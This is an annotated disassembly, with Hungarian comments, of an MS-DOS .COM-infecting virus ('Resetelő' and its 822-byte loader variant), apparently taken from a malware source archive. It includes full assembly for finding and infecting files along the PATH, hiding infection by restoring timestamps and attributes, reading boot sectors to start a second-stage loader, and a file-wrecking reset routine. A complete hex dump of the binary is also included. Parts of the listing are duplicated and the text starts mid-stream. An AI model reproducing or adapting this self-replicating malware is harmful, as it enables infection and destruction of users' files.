;A file eredeti (mostani) idejnek lekrdezse:
;{Ez is megtal lhat˘ lenne az ENTRY ter<65>leten!}
022A B80057 MOV AX,5700 ;Get Date & Time
022D CD21 INT 21
022F 898C0400 MOV [SI+0004],CX ;ERE_TIME (02FD)
0233 89940600 MOV [SI+0006],DX ;ERE_DATE (02FF)
;Annak eld”ntse , hogy a kiv lasztott filet t”nkretegye-e ,
;vagy megfert”zze . Lekrdezi a jelenlegi id”t , s ha m sod-
;perceinek sz ma 8-cal oszthat˘ , akkor a filet resetel”v te-
;szi, egybknt pedig megfert”zi. Igy az esetek 2/15-”d rsz-
;ben teszi csak t”nkre a filet.
0237 B42C MOV AH,2C ;A mostani id” lekrdezse
0239 CD21 INT 21
023B 80E607 AND DH,07 ;A m sodpercek als˘ 3 bitje
023E EB0D JMP 024D ;Fert”zs
0240 90 NOP
; Szemt a Reselet”lb”l
0241 B440 MOV AH,40
0243 B90500 MOV CX,0005
0246 8BD6 MOV DX,SI
0248 81C28A00 ADD DX,008A
024C 90 NOP
;-----------------------------------------
; Fert”zs:
;-----------------------------------------
;Az eredeti file els” 3 bytej nak meg”rzse , hogy ks”bb mg
;futtatni lehessen.
024D B43F MOV AH,3F ;Olvas s fileb˘l
024F B90300 MOV CX,0003 ;Az els” 3 byte beolvas sa
0252 BA0A00 MOV DX,000A
0255 90 NOP ;{piszok}
0256 03D6 ADD DX,SI ;ERE_KEZD (0303)
0258 CD21 INT 21
025A 7255 JB 02B1 ;Hib n l vge
025C 3D0300 CMP AX,0003
025F 7550 JNZ 02B1 ;Hib n l vge
;File vgre  ll s, az Łj cˇmek kisz mˇt sa:
0261 B80242 MOV AX,4202 ;File Pointer file vgre  llˇt sa
0264 B90000 MOV CX,0000
0267 BA0000 MOV DX,0000
026A CD21 INT 21
026C 7243 JB 02B1 ;{Itt nem nagyon lehet hiba!}
;A file elejre irand˘ JMP operandus nak kisz mˇt sa:
026E 8BC8 MOV CX,AX ;AX-ben a file hossza
0270 2D0300 SUB AX,0003 ;AX-ben az eltol s a JMP utasˇt s-
;hoz, ahhoz amit a file elejre fog
;majd ˇrni . Igy ez a JMP a file
;mostani vge ut ni bytera fog mu-
;tatni.
0273 89840E00 MOV [SI+000E],AX ;CIM_JMP (0307)
;Az Łj fileon bel<65>li adatter<65>let cˇmnek kisz mˇt sa s be l-
;lˇt sa:
0277 81C1F902 ADD CX,02F9 ;CX az Łj fileon bel<65>li adatter<65>-
027B 8BFE MOV DI,SI ;letre mutat.
027D 81EFF701 SUB DI,01F7 ;A vˇrus els” utasˇt s nak (MOV DX,
;02F9) operandus nak cˇme.
0281 890D MOV [DI],CX ;Ide ˇrja az adatter<65>let cˇmt
;-----------------------------------------
; A vˇrus hozz m solja mag t a filehoz:
;-----------------------------------------
;(A filemutat˘ a file vgre mutat.)
0283 B440 MOV AH,40 ;Ir s fileba.
0285 B93603 MOV CX,0336 ;822 byte (a vˇrus hossza)
0288 8BD6 MOV DX,SI
028A 81EAF901 SUB DX,01F9 ;DX a vˇrus els” bytej ra mutat
028E CD21 INT 21
0290 721F JB 02B1 ;Hib n l vge
0292 3D3603 CMP AX,0336
0295 751A JNZ 02B1 ;Ha nem ˇrta ki mind a 648 byteot
;Az els” 3 byte  t llˇt sa, egy a file vgre mutat˘ ugr˘ uta-
;sˇt sra:
0297 B80042 MOV AX,4200 ;A file pointer a file elejre!
029A B90000 MOV CX,0000
029D BA0000 MOV DX,0000
02A0 CD21 INT 21
02A2 720D JB 02B1 ;{Itt sem lehet hiba!}
02A4 B440 MOV AH,40 ;Ir s fileba
02A6 B90300 MOV CX,0003 ;3 byte
02A9 8BD6 MOV DX,SI
02AB 81C20D00 ADD DX,000D ;B_JMP (0306) DX az ugr˘ utasˇt sra
02AF CD21 INT 21 ;mutat
;Az eredeti id” ( m r a fert”zsjelzssel egy<67>tt ) vissza llˇ-
;t sa:
02B1 8B940600 MOV DX,[SI+0006] ;ERE_DATE (02FF)
02B5 8B8C0400 MOV CX,[SI+0004] ;ERE_TIME (027D)
02B9 81E1E0FF AND CX,FFE0 ;{Teljesen felesleges!}
02BD 81C91F00 OR CX,001F ;M r volt fert”zve jelzs
02C1 B80157 MOV AX,5701 ;Set Date & Time
02C4 CD21 INT 21
;A file lez r sa:
02C6 B43E MOV AH,3E ;Close Handle
02C8 CD21 INT 21
;Az eredeti attributtum vissza llˇt sa:
02CA B80143 MOV AX,4301 ;Set File Attributtum
02CD 8B8C0800 MOV CX,[SI+0008] ;ERE_ATTR (0301)
02D1 BA1F00 MOV DX,001F
02D4 90 NOP
02D5 03D6 ADD DX,SI ;FILE_PATH (0318)
02D7 CD21 INT 21
;DTA vissza llˇt sa az eredeti cˇmre:
02D9 1E PUSH DS
02DA B41A MOV AH,1A ;Set DTA
02DC 8B940000 MOV DX,[SI+0000] ;ERE_DTA_OFS (02F9)
02E0 8E9C0200 MOV DS,[SI+0002] ;ERE_DTA_SEG (02FB)
02E4 CD21 INT 21
02E6 1F POP DS
;-----------------------------------------
; Az eredeti program futtat sa:
;-----------------------------------------
02E7 59 POP CX ;CX vissza llˇt sa
02E8 33C0 XOR AX,AX ;Regiszterek null z sa
02EA 33DB XOR BX,BX
02EC 33D2 XOR DX,DX
02EE 33F6 XOR SI,SI
02F0 BF0001 MOV DI,0100
02F3 57 PUSH DI ;0100 a stackre
02F4 33FF XOR DI,DI
02F6 C2FFFF RET FFFF ;100-on folytat˘dik a vezrls
;SP-- {Hogy minek?}
;-----------------------------------------
; ADAT TERšLET
;-----------------------------------------
;Ide mutat (02F9-re) a vˇrus elejn DX, ks”bb SI,BX.
02F9 ERE_DTA_OFS DW (?) ;[SI+00] Eredeti DTA cˇme
02FB ERE_DTA_SEG DW (?) ;[SI+02]
02FD ERE_TIME DW (?) ;[SI+04] A file eredeti ideje,
02FF ERE_DATE DW (?) ;[SI+06] d tuma,
0301 ERE_ATTR DW (?) ;[SI+08] attributtuma
0303 ERE_KEZD DB 3 DUP (?) ;[SI+0A]
;A file eredeti els” 3 byteja.
;A k”vetkez” 3 byteon lesz az a 3 byte , amit a vˇrus egy meg-
;fert”zend” file elejre fog ˇrni.
0306 B_JMP DB E9 ;[SI+0D]
;JMP gpik˘dja
0307 CIM_JMP DW (?) ;Eltol s (JMP operandusa)
0309 KERES_STR DB '*.COM',0 ;[SI+10]
;Ezt a stringet m solja a
;FILE_NEV_MUT cˇmre
030F PATH_MUT DW (?) ;[SI+16]
;Hol a k”vetkez” aldirectory neve
;az environmenten.
0311 FILE_NEV_MUT DW (?) ;[SI+18]
;Az  tm solt aldirectory m”g mu-
;tat.
;Azt mutatja , hogy hova kell a
;keressi stringet(*.COM), majd a
;file nevt m solni a FILE_PATH-
;on bel<65>l ahhoz, hogy teljes utat
;kapjunk.
0313 STR_PATH DB 'PATH=' ;[SI+1A] Ezt a stringet keresi az
;environment ter<65>leten.
0318 FILE_PATH DB 40 DUP (?);[SI+1F]
;Itt lesz majd a keressi string
;s a fert”zend” file neve Łttal
;egy<67>tt.
;Ide mutat a DTA. Ezt a ter<65>letet fogja a DOS a file adataival
;felt”lteni.
0358 ENTRY DB 15 DUP (?);Fenntartott [SI+5F]
036D ENT_ATTR DB (?) ;Attributtum [SI+74]
036E ENT_IDO DW (?) ;Keletkezs ideje [SI+75]
0370 ENT_DATUM DW (?) ;Keletkezs d tuma [SI+77]
0372 ENT_HOSSZ DW (?) ;Als˘ sz˘ [SI+79]
0374 DW (?) ;Fels” sz˘ [SI+7B]
0376 ENT_NEV DB 0D DUP (?);Megtal lt file neve [SI+7D]
0383 RESET DB EA,F0,FF,00,F0 ;JMP F000:FFF0 [SI+8A]
;Nem haszn lja
;----------------------------------------------------
; A T”lt”get”t behŁz˘ rsz
;----------------------------------------------------
0388 50 PUSH AX ;Regiszterek elmentse
0389 53 PUSH BX
038A 51 PUSH CX
038B 52 PUSH DX
038C 06 PUSH ES
038D 1E PUSH DS
038E 57 PUSH DI
038F 56 PUSH SI
0390 E80000 CALL 0393 ;Lebuk s !! (/g)
0393 5B POP BX ;BX=0393
;A: BOOT beolvas sa/T”lt”get” lekrdezse
0394 BEA55A MOV SI,5AA5 ;T”lt”get” lekrdezse
0397 BFAA55 MOV DI,55AA
039A 0E PUSH CS
039B 07 POP ES
039C 81C3E803 ADD BX,03E8 ;BX=077B
03A0 81FBE803 CMP BX,03E8
03A4 7303 JNB 03A9
03A6 E98200 JMP 042B ;Ha nincs elg szabad mem˘ria a szegmensen
03A9 53 PUSH BX
03AA B80102 MOV AX,0201 ;A:BOOT beolvas sa
03AD BA0000 MOV DX,0000
03B0 B90100 MOV CX,0001
03B3 CD13 INT 13
03B5 5B POP BX
03B6 7308 JNB 03C0
03B8 80FC06 CMP AH,06 ;Ha lemezcsere volt, az nem hiba
03BB 74EC JZ 03A9
03BD EB6C JMP 042B ;Val˘di hiba->vge
03BF 90 NOP
03C0 81FE5AA5 CMP SI,A55A
03C4 7465 JZ 042B ;Vge, ha a T”lt”get” m r a mem˘ri ban van
;Van-e elg szabad mem˘ria a T”lt”get” beolvas s hoz
03C6 8CC8 MOV AX,CS
03C8 050010 ADD AX,1000
03CB 53 PUSH BX
03CC 50 PUSH AX
03CD CD12 INT 12 ;Max mem.
03CF BB4000 MOV BX,0040
03D2 F7E3 MUL BX ;AX-ben a mem˘ria tetejnek szegmense
03D4 2D0010 SUB AX,1000 ;legal bb 4Kb kell a T”lt”get”nek
03D7 8BD8 MOV BX,AX
03D9 58 POP AX ;CS+1000
03DA 3BD8 CMP BX,AX
03DC 7304 JNB 03E2
03DE 5B POP BX
03DF EB4A JMP 042B ;Vge, ha nincs elg szabad mem˘ria
03E1 90 NOP
; A lemez ut˘ls˘ s vj nak megkeresse
03E2 5B POP BX ;BX=077B
03E3 8EC0 MOV ES,AX ;Max mem-1000
03E5 2E CS:
03E6 8B4718 MOV AX,[BX+18] ;S v hossza
03E9 2E CS:
03EA 8B4F1A MOV CX,[BX+1A] ;Oldalak sz ma
03ED F7E1 MUL CX
03EF 8BC8 MOV CX,AX ;Egy cilinder nagys ga
03F1 2E CS:
03F2 8B4713 MOV AX,[BX+13] ;Szektorok sz ma
03F5 BA0000 MOV DX,0000
03F8 F7F1 DIV CX ;Osztva a cilinder nagys g val AL-ben a s v
; Az ut˘ls˘ s v beolvas sa
03FA 81EBE803 SUB BX,03E8 ;BX=0393
03FE 53 PUSH BX
03FF 8AE8 MOV CH,AL ;40/80-dik s v
0401 B101 MOV CL,01
0403 BB0001 MOV BX,0100 ;ES:BX-re olvas !
0406 BA0000 MOV DX,0000
0409 B80802 MOV AX,0208 ;8 szektor beolvas sa
040C CD13 INT 13
040E 5B POP BX
040F 721A JB 042B ;Hib n l vge
; Ha a T”lt”get”t tal l, elindˇtja
0411 53 PUSH BX
0412 BB0001 MOV BX,0100
0415 26 ES:
0416 8B07 MOV AX,[BX]
0418 3D5224 CMP AX,2452 ;Azonosˇt˘
041B 5B POP BX
041C 750D JNZ 042B ;Ha nem T”lt”get”
041E 8BC3 MOV AX,BX
0420 059800 ADD AX,0098 ;AX=042B (A visszatrsre mutat)
0423 0E PUSH CS
0424 50 PUSH AX
0425 B80A01 MOV AX,010A ;T”lt”get” belpsi pontja
0428 06 PUSH ES
0429 50 PUSH AX
042A CB RETF
; Visszatrs
042B 5E POP SI ;Regiszterek vissza
042C 5F POP DI
042D 1F POP DS
042E 07 POP ES
042F 5A POP DX
0430 59 POP CX
0431 5B POP BX
0432 58 POP AX
0433 C3 RET
0434 0000 DW 0000 ;???
A vˇrus hexa dumpja :
0100 51 BA F9 02 FC 8B F2 81-C6 0A 00 BF 00 01 B9 03 Q...............
0110 00 F3 A4 8B F2 B4 30 CD-21 3C 00 75 03 E9 C7 01 ......0.!<.u....
0120 06 B4 2F CD 21 89 9C 00-00 8C 84 02 00 E8 58 02 ../.!.........X.
0130 07 BA 5F 00 90 03 D6 B4-1A CD 21 06 56 8E 06 2C .._.......!.V..,
0140 00 BF 00 00 5E 56 81 C6-1A 00 AC B9 00 80 F2 AE ....^V..........
0150 B9 04 00 AC AE 75 ED E2-FA 5E 07 89 BC 16 00 8B .....u...^......
0160 FE 81 C7 1F 00 8B DE 81-C6 1F 00 8B FE EB 3A 83 ..............:.
0170 BC 16 00 00 75 03 E9 60-01 1E 56 26 8E 1E 2C 00 ....u..`..V&..,.
0180 8B FE 26 8B B5 16 00 81-C7 1F 00 AC 3C 3B 74 0A ..&.........<;t.
0190 3C 00 74 03 AA EB F4 BE-00 00 5B 1F 89 B7 16 00 <.t.......[.....
01A0 80 7D FF 5C 74 03 B0 5C-AA 89 BF 18 00 8B F3 81 .}.\t..\........
01B0 C6 10 00 B9 06 00 F3 A4-8B F3 B4 4E BA 1F 00 90 ...........N....
01C0 03 D6 B9 03 00 CD 21 EB-04 B4 4F CD 21 73 02 EB ......!...O.!s..
01D0 9E 8B 84 75 00 24 1F 3C-1F 74 EE 81 BC 79 00 00 ...u.$.<.t...y..
01E0 FA 77 E6 83 BC 79 00 0A-72 DF 8B BC 18 00 56 81 .w...y..r.....V.
01F0 C6 7D 00 AC AA 3C 00 75-FA 5E B8 00 43 BA 1F 00 .}...<.u.^..C...
0200 90 03 D6 CD 21 89 8C 08-00 B8 01 43 81 E1 FE FF ....!......C....
0210 BA 1F 00 90 03 D6 CD 21-B8 02 3D BA 1F 00 90 03 .......!..=.....
0220 D6 CD 21 73 03 E9 A2 00-8B D8 B8 00 57 CD 21 89 ..!s........W.!.
0230 8C 04 00 89 94 06 00 B4-2C CD 21 80 E6 07 EB 0D ........,.!.....
0240 90 B4 40 B9 05 00 8B D6-81 C2 8A 00 90 B4 3F B9 ..@...........?.
0250 03 00 BA 0A 00 90 03 D6-CD 21 72 55 3D 03 00 75 .........!rU=..u
0260 50 B8 02 42 B9 00 00 BA-00 00 CD 21 72 43 8B C8 P..B.......!rC..
0270 2D 03 00 89 84 0E 00 81-C1 F9 02 8B FE 81 EF F7 -...............
0280 01 89 0D B4 40 B9 36 03-8B D6 81 EA F9 01 CD 21 ....@.6........!
0290 72 1F 3D 36 03 75 1A B8-00 42 B9 00 00 BA 00 00 r.=6.u...B......
02A0 CD 21 72 0D B4 40 B9 03-00 8B D6 81 C2 0D 00 CD .!r..@..........
02B0 21 8B 94 06 00 8B 8C 04-00 81 E1 E0 FF 81 C9 1F !...............
02C0 00 B8 01 57 CD 21 B4 3E-CD 21 B8 01 43 8B 8C 08 ...W.!.>.!..C...
02D0 00 BA 1F 00 90 03 D6 CD-21 1E B4 1A 8B 94 00 00 ........!.......
02E0 8E 9C 02 00 CD 21 1F 59-33 C0 33 DB 33 D2 33 F6 .....!.Y3.3.3.3.
02F0 BF 00 01 57 33 FF C2 FF-FF 80 00 57 0B 96 01 21 ...W3......W...!
0300 00 20 00 E9 00 00 E9 FD-0F 2A 2E 43 4F 4D 00 71 . .......*.COM.q
0310 07 21 07 50 41 54 48 3D-54 45 53 5A 54 2E 43 4F .!.PATH=TESZT.CO
0320 4D 00 4F 4D 00 20 20 20-20 20 20 20 20 20 20 20 M.OM.
0330 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
0340 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
0350 20 20 20 20 20 20 20 20-03 3F 3F 3F 3F 3F 3F 3F .???????
0360 3F 43 4F 4D 03 03 00 4B-09 A1 7D 73 6F 20 96 01 ?COM...K..}so ..
0370 21 00 00 10 00 00 54 45-53 5A 54 2E 43 4F 4D 00 !.....TESZT.COM.
0380 4F 4D 00 EA F0 FF 00 F0-50 53 51 52 06 1E 57 56 OM......PSQR..WV
0390 E8 00 00 5B BE A5 5A BF-AA 55 0E 07 81 C3 E8 03 ...[..Z..U......
03A0 81 FB E8 03 73 03 E9 82-00 53 B8 01 02 BA 00 00 ....s....S......
03B0 B9 01 00 CD 13 5B 73 08-80 FC 06 74 EC EB 6C 90 .....[s....t..l.
03C0 81 FE 5A A5 74 65 8C C8-05 00 10 53 50 CD 12 BB ..Z.te.....SP...
03D0 40 00 F7 E3 2D 00 10 8B-D8 58 3B D8 73 04 5B EB @...-....X;.s.[.
03E0 4A 90 5B 8E C0 2E 8B 47-18 2E 8B 4F 1A F7 E1 8B J.[....G...O....
03F0 C8 2E 8B 47 13 BA 00 00-F7 F1 81 EB E8 03 53 8A ...G..........S.
0400 E8 B1 01 BB 00 01 BA 00-00 B8 08 02 CD 13 5B 72 ..............[r
0410 1A 53 BB 00 01 26 8B 07-3D 52 24 5B 75 0D 8B C3 .S...&..=R$[u...
0420 05 98 00 0E 50 B8 0A 01-06 50 CB 5E 5F 1F 07 5A ....P....P.^_..Z
0430 59 5B 58 C3 00 00 Y[X...


669
MSDOS/Virus.MSDOS.Unknown.v_822.lst Normal file
View File

@ -0,0 +1,669 @@
A Resetel” vˇrus T”lt”get” fle mut nsa
***************************************
A Resetel” vˇrussal teljes egszben megegyezik a fert”z” mechanizmus.
Eltekintve att˘l, hogy ez a mut ns nem tesz t”nkre f jlokat. Az adatter<65>let is
ugyanazon a cˇmen van, ˇgy ugyanŁgy lehet ˇrtani, mint a Resetel”t. A v ltoz s:
a vˇrus hossza 822 byte, minden indˇt s ut n az A:-r˘l megpr˘b lja beolvasni a
BOOT-ot, majd a 40/80-dik s vot. Ha valamelyik T”lt”get”vel fert”z”tt, akkor
elindˇtja a T”lt”get”t !
;Ide (0100-ra) mutat a file elejr”l az ugr˘ utasˇt s.
;Els” feladat: az els” 3 byte visszaˇr sa az eredetire.
0100 51 PUSH CX ;CX a stacken marad mindvgig.
;A k”vetkez” utasˇt s operandus t ( jelen esetben 02F9-et )
;fert”zskor  llˇtja be , ˇgy mindig a helyes cˇmre mutat.
0101 BAF902 MOV DX,02F9 ;Eredeti els” 3 byte cˇme-10h
0104 FC CLD ;( ERE_DTA_OFS)
0105 8BF2 MOV SI,DX
0107 81C60A00 ADD SI,000A ;SI=offset ERE_KEZD
010B BF0001 MOV DI,0100 ;Program eleje
010E B90300 MOV CX,0003 ;3 byte
0111 F3 REPZ
0112 A4 MOVSB ;Az eredeti byteok vissza llˇt sa
;-----------------------------------------
; Install ci˘s rsz:
;-----------------------------------------
;DOS verzi˘ lekrdezse. 1.00-n l kisebb verzi˘n l az eredeti
;program futtat sa: ekkor a vˇrus nem m<>k”dik.
0113 8BF2 MOV SI,DX ;Ezut n SI-ben az adatter<65>let cˇme
0115 B430 MOV AH,30
0117 CD21 INT 21 ;DOS verzi˘ lekrdezse
0119 3C00 CMP AL,00 ;Csak 1.00-n l kisebbnl lp ki
011B 7503 JNZ 0120
011D E9C701 JMP 02E7 ;Eredeti program futtat sa
;Disk Transzfer Address lekrdezse, elmentse
0120 06 PUSH ES
0121 B42F MOV AH,2F
0123 CD21 INT 21 ;DTA leolvas sa (ES:BX), meg”rzse
0125 899C0000 MOV [SI+0000],BX ;ERE_DTA_OFS (02F9)
0129 8C840200 MOV [SI+0002],ES ;ERE_DTA_SEG (02FB)
;-------------------------------------------------------
; A beiktatott behŁz˘ rsz
;-------------------------------------------------------
012D E85802 CALL 0388
0130 07 POP ES
;DTA be llˇt sa ENTRY cˇmre (0358). Igy a FindFirst, FindNext
;DOS funkci˘k ide fogj k m solni a file adatait (nevt,idejt,
;hossz t,stb).
0131 BA5F00 MOV DX,005F
;{Val˘szˇn<CB87>leg rgi assemblerrel ˇrt k a vˇrust, ezrt van itt
;egy NOP utasˇt s.}
0134 90 NOP
0135 03D6 ADD DX,SI
0137 B41A MOV AH,1A
0139 CD21 INT 21 ;DTA  llˇt sa DS:DX-re: ENTRY(0358)
;A PATH-ok cˇmnek megkeresse. Ha az aktu lis k”nyvt rban m r
;mindegyik filet megfert”zte , itt taj lja meg azoknak az al-
;k”nyvt raknak a nevt , amelyekben mg megfert”zend” fileokat
;tal lhat.
013B 06 PUSH ES
013C 56 PUSH SI
013D 8E062C00 MOV ES,[002C];Environment (k”rnyezet) segmense
0141 BF0000 MOV DI,0000 ;ES:DI fog a megfelel” helyre
;(a k”vetkez” directoryra) mutatni
;A k”vetkez” rsz a PATH= sz”veget keresi meg az environment
;ter<65>leten:
0144 5E POP SI
0145 56 PUSH SI
0146 81C61A00 ADD SI,001A ;STR_PATH (0313)
014A AC LODSB ;AL=DS:[SI],SI++
014B B90080 MOV CX,8000 ;max 32k az environment
014E F2 REPNZ
014F AE SCASB ;AL-ES:[DI] Megkeresi a k”vetkez”
;'P' bet<65>t
0150 B90400 MOV CX,0004 ;Mg 4 bet<65> azonosˇt sa
0153 AC LODSB ;AL=DS:[SI],SI++
0154 AE SCASB ;AL-ES:[DI],DI++
0155 75ED JNZ 0144 ;Ugr s, ha a k”vetkez” 4 bet<65> nem
;egyezik (nem 'ATH=')
0157 E2FA LOOP 0153
0159 5E POP SI ;ES:DI mutat az els” PATH-ra
015A 07 POP ES
015B 89BC1600 MOV [SI+0016],DI ;PATH_MUT (030F)
015F 8BFE MOV DI,SI ;{Hogy ez minek ? Ks”bb Łgyis
0161 81C71F00 ADD DI,001F ;fel<65>lˇrja} FILE_PATH (0318)
0165 8BDE MOV BX,SI ;Ezut n BX mutat az adatokra
0167 81C61F00 ADD SI,001F ;SI is a FILE_PATH-ra(0318) mutat
016B 8BFE MOV DI,SI ;{Az el”bb m r be llitotta (?)}
016D EB3A JMP 01A9
;A k”vetkez” PATH-ban megadott aldirectoryt FILE_PATH-ra m -
;solja. Igy a k”vetkez” fileokat m r ebben az aldirectoryban
;fogja keresni.
016F 83BC160000 CMP WORD PTR [SI+0016],+00 ;PATH_MUT (030F)
0174 7503 JNZ 0179
0176 E96001 JMP 02D9 ;Ugr s, ha nincs t”bb PATH aldir.
;(mindet megfert”te m r)
0179 1E PUSH DS
017A 56 PUSH SI
017B 26 ES:
017C 8E1E2C00 MOV DS,[002C] ;Environment segmense
0180 8BFE MOV DI,SI ;(02F9)
0182 26 ES:
0183 8BB51600 MOV SI,[DI+0016] ;PATH_MUT (030F)
0187 81C71F00 ADD DI,001F ;FILE_PATH cˇme (0318)
018B AC LODSB ;AL=DS:[SI] SI++
018C 3C3B CMP AL,3B ;';'
018E 740A JZ 019A
0190 3C00 CMP AL,00
0192 7403 JZ 0197
0194 AA STOSB ;ES:[DI]:=AL DI++
0195 EBF4 JMP 018B ;Źtm sol s ';' vagy #0-ig
;#0-val z rult a PATH bejegyzs => nem lesz t”bb
0197 BE0000 MOV SI,0000
019A 5B POP BX ;Ezut n BX mutat az adatokra
019B 1F POP DS
019C 89B71600 MOV [BX+0016],SI ;PATH_MUT (030F) = 0
;( Nincs t”bb PATH jelzs )
;A k”vetkez” PATH-ban adott aldir. m r  tm solva.
01A0 807DFF5C CMP BYTE PTR [DI-01],5C
01A4 7403 JZ 01A6 ;Ugr s, ha az ut˘ls˘ bet<65> a '\'
01A6 B05C MOV AL,5C ;Egybknt '\' ˇr s
01A8 AA STOSB ;ES:[DI]:=AL DI++
;Egy aldirectory kirtkelse . El”sz”r az aktu lis , majd a
;FILE_PATH -ra m solt aldirectory vgignzse, fert”zs.
;DI a FILE_PATH-ba ˇrt aldirectory neve ut ni pozici˘ra mutat.
;A COM kiterjeszts<E2809A> fileok megkeresse:
01A9 89BF1800 MOV [BX+0018],DI ;FILE_NEV_MUT (0311)
;Ide kell majd a file nevt
;m solni (az aldir. neve ut n)
01AD 8BF3 MOV SI,BX ;(02F9)
01AF 81C61000 ADD SI,0010 ;KERES_STR (0309)
01B3 B90600 MOV CX,0006 ;6 bet<65>  tm sol sa ('*.COM',0)
01B6 F3 REPZ ;A PATH-ban megadott aldirectory
01B7 A4 MOVSB ;m”g , ˇgy teljes keressi utunk
;lesz
01B8 8BF3 MOV SI,BX ;(02F9)
01BA B44E MOV AH,4E ;FIND FIRST ENTRY
01BC BA1F00 MOV DX,001F
01BF 90 NOP
01C0 03D6 ADD DX,SI ;FILE_PATH (0318)
01C2 B90300 MOV CX,0003 ;HIDDEN, READ ONLY
01C5 CD21 INT 21 ;Az els” COM kiterjeszts<E2809A> file
;megkeresse . A file adatait a DTA
; ltal mutatott cˇmre (ENTRY 0358)
;m solja.
01C7 EB04 JMP 01CD
;K”vetkez” COM file keresse (adatai ENTRY-re ker<65>lnek).
01C9 B44F MOV AH,4F ;FIND NEXT
01CB CD21 INT 21
01CD 7302 JNB 01D1
01CF EB9E JMP 016F ;Ha nem tal l t”bb COM filet : —j
;aldirt keres a PATH-ban
;M r tal lt COM filet. Adataival az ENTRY fel van t”ltve.Ennek
;a filenak az ellen”rzse, fert”zse k”vetkezik.
;Annak ellen”rzse , hogy a file megfert”zhet”-e (fert”z”tt-e,
;tŁl hosszŁ-e, tŁl r”vid-e) . Ha nem fert”zhet” visszaugrik Łj
;fileokat keresni.
01D1 8B847500 MOV AX,[SI+0075] ;ENT_IDO (036E) A file ideje
01D5 241F AND AL,1F
01D7 3C1F CMP AL,1F ;Ugr s, ha az als˘ 5 bit 1-es:
01D9 74EE JZ 01C9 ;a file m r fert”z”tt.
01DB 81BC790000FA CMP WORD PTR [SI+0079],FA00 ;ENT_HOSSZ (0372)
01E1 77E6 JA 01C9 ;Ugr s, ha file hossza nagyobb,mint
;64000h (m r nem fr bele a vˇrus)
01E3 83BC79000A CMP WORD PTR [SI+0079],+0A ;ENT_HOSSZ (0372)
01E8 72DF JB 01C9 ;Ugr s, ha r”videbb 10h byten l
;-----------------------------------------
; Megvan a kiv laszott file.
;-----------------------------------------
;A file nevt az aldirectory neve ut n kell m solni , hogy a
;teljes Łt rendelkezs<E2809A>nkre  lljon , ˇgy majd meg tudja nyitni
;a filet.
01EA 8BBC1800 MOV DI,[SI+0018] ;FILE_NEV_MUT (0311) Ide fogja
01EE 56 PUSH SI ;a file nevt m solni
01EF 81C67D00 ADD SI,007D ;ENT_NEV (0376)
01F3 AC LODSB ;AL:=DS:[SI] SI++
01F4 AA STOSB ;ES:[DI]:=AL DI++ (M sol s)
01F5 3C00 CMP AL,00 ;Nvlez r˘ 0-ig m sol
01F7 75FA JNZ 01F3
01F9 5E POP SI ;SI Łjra az adatokra mutat
;A file egyes eredeti inform ci˘inak meg”rzse , hogy a fert”-
;zs ne t<>nj”n fel.
;Az eredeti attributtum meg”rzse:
;{Fogalmam sincs mirt kell a file attributtum t mg egyszer
;lekrdezni , amikor az ENTRY ter<65>leten megtal lhat˘ . Tal n a
;vˇrus ˇr˘ja nem tudta?}
01FA B80043 MOV AX,4300 ;File attributtum nak lekrdezse
01FD BA1F00 MOV DX,001F ;FILE_PATH ([SI+1F] 0318)
0200 90 NOP ;{piszok}
0201 03D6 ADD DX,SI ;DS:DX mutat a file Łtj ra
0203 CD21 INT 21 ;CX-ben az attributtum
0205 898C0800 MOV [SI+0008],CX ;ERE_ATTR (0301)
;A file ˇr svdelmnek t”rlse:
0209 B80143 MOV AX,4301 ;File attributtum nak  llit sa
020C 81E1FEFF AND CX,FFFE ;Read Only jelzs t”rlse
0210 BA1F00 MOV DX,001F ;{ Az el”bb m r be llˇtotta, minek
0213 90 NOP ;Łjra? }
0214 03D6 ADD DX,SI ;FILE_PATH (0318)
0216 CD21 INT 21
;File megnyit sa:
0218 B8023D MOV AX,3D02 ;File megnyit sa ˇr sra, olvas sra
021B BA1F00 MOV DX,001F ;{Mg egyszer be llˇtja!}
021E 90 NOP ;{piszok}
021F 03D6 ADD DX,SI ;FILE_PATH (0318)
0221 CD21 INT 21
0223 7303 JNB 0228
0225 E9A200 JMP 02CA ;Hib n l: nincs fert”zs
0228 8BD8 MOV BX,AX ;Handle
;A file eredeti (mostani) idejnek lekrdezse:
;{Ez is megtal lhat˘ lenne az ENTRY ter<65>leten!}
022A B80057 MOV AX,5700 ;Get Date & Time
022D CD21 INT 21
022F 898C0400 MOV [SI+0004],CX ;ERE_TIME (02FD)
0233 89940600 MOV [SI+0006],DX ;ERE_DATE (02FF)
;Annak eld”ntse , hogy a kiv lasztott filet t”nkretegye-e ,
;vagy megfert”zze . Lekrdezi a jelenlegi id”t , s ha m sod-
;perceinek sz ma 8-cal oszthat˘ , akkor a filet resetel”v te-
;szi, egybknt pedig megfert”zi. Igy az esetek 2/15-”d rsz-
;ben teszi csak t”nkre a filet.
0237 B42C MOV AH,2C ;A mostani id” lekrdezse
0239 CD21 INT 21
023B 80E607 AND DH,07 ;A m sodpercek als˘ 3 bitje
023E EB0D JMP 024D ;Fert”zs
0240 90 NOP
; Szemt a Reselet”lb”l
0241 B440 MOV AH,40
0243 B90500 MOV CX,0005
0246 8BD6 MOV DX,SI
0248 81C28A00 ADD DX,008A
024C 90 NOP
;-----------------------------------------
; Fert”zs:
;-----------------------------------------
;Az eredeti file els” 3 bytej nak meg”rzse , hogy ks”bb mg
;futtatni lehessen.
024D B43F MOV AH,3F ;Olvas s fileb˘l
024F B90300 MOV CX,0003 ;Az els” 3 byte beolvas sa
0252 BA0A00 MOV DX,000A
0255 90 NOP ;{piszok}
0256 03D6 ADD DX,SI ;ERE_KEZD (0303)
0258 CD21 INT 21
025A 7255 JB 02B1 ;Hib n l vge
025C 3D0300 CMP AX,0003
025F 7550 JNZ 02B1 ;Hib n l vge
;File vgre  ll s, az Łj cˇmek kisz mˇt sa:
0261 B80242 MOV AX,4202 ;File Pointer file vgre  llˇt sa
0264 B90000 MOV CX,0000
0267 BA0000 MOV DX,0000
026A CD21 INT 21
026C 7243 JB 02B1 ;{Itt nem nagyon lehet hiba!}
;A file elejre irand˘ JMP operandus nak kisz mˇt sa:
026E 8BC8 MOV CX,AX ;AX-ben a file hossza
0270 2D0300 SUB AX,0003 ;AX-ben az eltol s a JMP utasˇt s-
;hoz, ahhoz amit a file elejre fog
;majd ˇrni . Igy ez a JMP a file
;mostani vge ut ni bytera fog mu-
;tatni.
